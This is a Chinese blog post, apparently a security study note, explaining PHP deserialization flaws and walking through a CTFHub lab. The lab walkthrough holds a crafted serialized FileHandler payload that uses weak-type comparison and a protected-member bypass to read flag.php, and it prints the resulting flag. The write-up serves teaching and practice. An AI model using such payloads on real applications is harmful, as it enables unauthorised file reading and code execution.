web漏洞-PHP反序列化

已于 2023-10-03 21:05:56 修改
阅读量386 收藏 1
点赞数 1
分类专栏: Web安全 文章标签: php web安全 网络安全
于 2023-10-03 20:48:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rumil/article/details/133528398
版权

目录

PHP反序列化

序列化

将对象转换成字符串

反序列化

相反,将字符串转换成对象。

数据格式的转换对象的序列化有利于对象的保存和传输,也可以让多个文件共享对象。

原理

未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。

serialize() //将一个对象转换成一个字符串

unserialize() //将字符串还原成一个对象

image-20231003194425283

//例如:
//无类,序列化和反序列化
<?php
    
$key="rumilc";
echo serialize($key);

echo "</br>";
$key2 = 's:6:"rumilc";';
echo unserialize($key2);

image-20231003201350953

涉及技术

有类和无类

有类和无类区别:有无class定义

基本概念

有类:触发魔术方法

魔术方法具体参考

触发:
unserialize函数的变量可控,文件中存在可利用的类,类中有魔术方法:
__construct()//创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发
......

image-20231003194540134

利用

真实应用下

CTF中常见

危害

SQL注入

目录遍历

代码执行

CTF靶场

题目地址

image-20231003201933892

进入环境:

image-20231003201958395

给了php代码,进行分析

根据题目以及代码,向下发现了unserialize

思路:
第一:获取flag存储flag.php
第二:两个魔术方法__destruct和 __construct
第三:传输str参数数据后触发destruct,存在is_valid过滤
第四:__destruct中会调用process,其中op=1写入及op=2读取
第五:涉及对象FileHandler,变量op及filename,content,进行构造输出

image-20231003202509676

image-20231003202718707

进行构造,序列化处理:

<?php
class FileHandler
{

    public $op = '2.0'; //源码观察发现,op为1时候是执行写入,为2时执行读
    //使用 ' 2'也可以绕过op的值
    public $filename="flag.php"; //文件开头调用的是flag.php
    public $content; //可以不用写,或者任意
}
$flag = new FileHandler();
echo serialize($flag);
?>

执行完成后,得到:

O:11:“FileHandler”:3:{s:2:“op”;s:3:“2.0”;s:8:“filename”;s:8:“flag.php”;s:7:“content”;N;}

image-20231003202816043

将此作为参数值,赋值给str进行请求

发现有返回,查看源码

image-20231003202938404

源码当中:

得到答案

image-20231003203006999

$FLAG = "ctfhub{2edb689c4de533b460e6c2af}";

还可以将其还原成对象:

<?php
	$key = 'O:11:"FileHandler":3:{s:2:"op";s:3:"2.0";s:8:"filename";s:8:"flag.php";s:7:"content";N;}';
	var_dump(unserialize($key));
?>

image-20231003210220260还原的对象结果:

object(__PHP_Incomplete_Class)#1 (4) {
  ["__PHP_Incomplete_Class_Name"]=>
  string(11) "FileHandler"
  ["op"]=>
  string(3) "2.0"
  ["filename"]=>
  string(8) "flag.php"
  ["content"]=>
  NULL
}

反序列化魔术方法调用,弱类型绕过,ascii绕过

== :弱等于。在比较前会先把两种字符串类型转成相同的再进行比较。

=== :强等于。在比较前会先判断两种字符串类型是否相同再进行比较,如果类型不同直接返回不相等。既比较值也比较类型。

使用该类对flag进行读取,这里面能利用的只有__destruct函数(析构函数)。

__destruct函数对$this->op进行了===判断并内容在2字符串时会赋值为1,

process函数中使用==对$this->op进行判断(为2的情况下才能读取内容),

因此这里存在弱类型比较,可以使用数字2或字符串’ 2’绕过判断。

is_valid函数还对序列化字符串进行了校验,因为成员被protected修饰,

因此序列化字符串中会出现ascii为0的字符。经过测试,在PHP7.2+的环境中,

使用public修饰成员并序列化,反序列化后成员也会被public覆盖修饰。

rumilc
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第38天:WEB漏洞-序列之PHP&JAVA全解(下)1
08-03
标题中的“WEB漏洞-序列之PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话题,即PHP和JAVA平台上的序列漏洞序列漏洞是由于程序在处理序列数据时没有充分验证输入,从而允许攻击者构造...
WEB漏洞-序列之PHP
硫酸超的博客
08-26 460
WEB漏洞-序列之PHP原理有类与无类php弱类型无类serialize()unserialize()PHP 序列热身题-无类问题-本地CTF 序列小真题-无类执行-实例有类触发魔术方法构造函数和析构函数__sleep() 和 __wakeup()__serialize() 和 __unserialize()CTF 序列练习题-有类魔术方法触发-本地网鼎杯 2020 青龙大真题-有类魔术方法触发-实例序列实战源代码分析 所有php里面的值都可以使用函数serialize()来返回一个包含
第37天:WEB漏洞-序列之PHP&JAVA全解(上)1
08-03
WEB漏洞-序列之PHP&JAVA全解(上) 在 WEB 应用程序中,序列是一种常见的漏洞,攻击者可以通过序列来控制代码执行、SQL 注入、目录遍历等不可控后果。在 PHP 和 JAVA 中,序列漏洞尤其常见,本文将...
PHP序列/对象注入漏洞分析
10-22
PHP序列/对象注入漏洞是一种安全风险,它发生在应用程序接收并序列用户提供的数据时。当不正确地处理序列过程时,攻击者可能能够构造恶意输入,导致代码执行、信息泄露或其他严重后果。在PHP中,序列是...
PHP多种序列/序列的方法详解
10-19
WDDX的优势在于其XML结构使得数据可读性强,但相比JSON和PHP序列,它的使用较少,因为其格式较复杂,且处理速度较慢。 总结: - `serialize` 和 `unserialize` 是PHP中基础且常用的序列序列工具,适用于...
PHP序列漏洞详解.rar
02-07
PHP序列序列** - **序列**:PHP的序列是将变量转换为字符串的过程,便于存储或传输。序列的结果是一个包含了变量类型、值以及任何与之相关的复杂数据结构的信息的特殊格式字符串。 - **序列**:...
[Meachines] [Easy] Beep Elastix-CMS-LFI
最新发布
07-27 252
#Elastix-CMS-LFI
PHP商城案例
王世凡的技术博客
07-26 309
http://www.e9933.com/
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1073
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始、启动、暂停、结束等。MICA 的守护进程。
PHP基础语法-Part2
weixin_51591328的博客
07-25 343
与其他语言相同。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 358
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
ecshop网站部署
qq_63926306的博客
07-24 305
ecshop网站部署
rce漏洞-ctfshow(50-70)
m0_74402888的博客
07-23 1132
文件名:
PHP 7+ PHP-FPM 参数配置注意事项
2301_82319473的博客
07-26 312
在安装 PHP 7+ 并使用 PHP-FPM 作为进程管理器时,确保 PHP-FPM 的参数配置正确至关重要。本文由ChatMoney团队出品,ChatMoney专注于AI应用落地与变现,我们提供全套、持续更新的AI源码系统与可执行的变现方案,致力于帮助更多人利用AI来变现,欢迎进入。遵循上述指南,您应该能够成功安装和配置 PHP 7+ 以及 PHP-FPM,并确保 Nginx 能够正确解析 PHP 文件。验证 PHP-FPM 和 Nginx 的用户权限设置是否正确,确保它们可以访问相应的文件和目录。
【CTFWP】ctfshow-web42
LongL_GuYu的博客
07-23 964
CTFWP,ctfshow-web42
文件上传总结
cyy001128的博客
07-24 941
此过程只会删除上传的文件,但是不会删除生成的文件,因此可以使用如下的php代码获取shell。通过界面上的上传功能上传了一个可执行的脚本文件,而WEB端的系统并未对其进行检测或者检测的逻辑做的不够好,使得恶意用户可以通过文件中上传的一句话木马获得操控权。Windows系统在保存1.php::$DATA一类的文件时会自动去除文件后的::$DATA字符串,保存的文件名为1.php。文件包含漏洞会将任意类型的文件当作php文件进行解析,如果文件中包含了php代码,则其中的php代码将会执行。
网络芯片(又称为PHY网络芯片)
czy8787475的博客
07-23 240
网络芯片(又称为PHY网络芯片)
BGP选路之Next Hop
txs1269928052的博客
07-23 717
根据前面的实验步骤得知,10.0.100.1/32路由在R1上的Next Hop为0.0.0.0,说明当10.0.100.1/32的路由信息在由R1传递至EBGP对等体R2的过程中,Next Hop属性会被自动修改为发送BGP报文的源地址,即 10.0.12.1。R3上的现象与R2上的现象类似,这里不再赘述。为了使R4的BGP路由表中去往10.0.100.1/32的路由信息标记为可用,并放进P路由表中,必须使R4去往10.0.100.1/32的 BGP路由信息中的Next Hop是可达的。
跨境电商独立站:Shopify/Wordpress/店匠选哪个?
dongdonglin77的博客
07-26 752
商家需要根据自己的资源、能力和市场定位,选择最适合自己的建站工具,并制定有效的运营计划。通过持续的市场调研、品牌建设、流量获取和客户服务,商家可以在独立站的道路上实现可持续发展。
php序列如何学习
09-25
PHP 序列是一种常见的安全漏洞,攻击者可以利用这个漏洞来执行恶意代码或者控制 Web 应用程序。要学习 PHP 序列,您可以按照以下步骤进行: 1.了解序列序列的基本概念。序列是将对象转换为字符串...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值